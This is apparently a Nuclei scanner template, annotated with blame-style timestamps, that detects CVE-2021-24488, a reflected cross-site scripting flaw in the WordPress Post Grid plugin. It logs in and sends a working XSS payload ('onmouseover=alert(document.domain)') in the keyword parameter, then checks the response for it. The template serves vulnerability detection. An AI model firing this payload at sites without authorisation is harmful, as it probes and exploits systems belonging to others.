2022-02-08 01:07:19 +00:00
id : CVE-2021-24488
info :
name : WordPress Plugin Post Grid < 2.1.8 - XSS
author : cckuailong
severity : medium
description : The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
reference :
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-24488
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
2022-02-08 01:07:19 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 19:02:39 +00:00
GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
2022-02-08 01:07:19 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-08 19:02:39 +00:00
- 'value="\"onmouseover=alert(document.domain)/">'
- 'Post Grid'
2022-02-08 01:07:19 +00:00
condition : and
- type : status
status :
2022-02-08 19:27:33 +00:00
- 200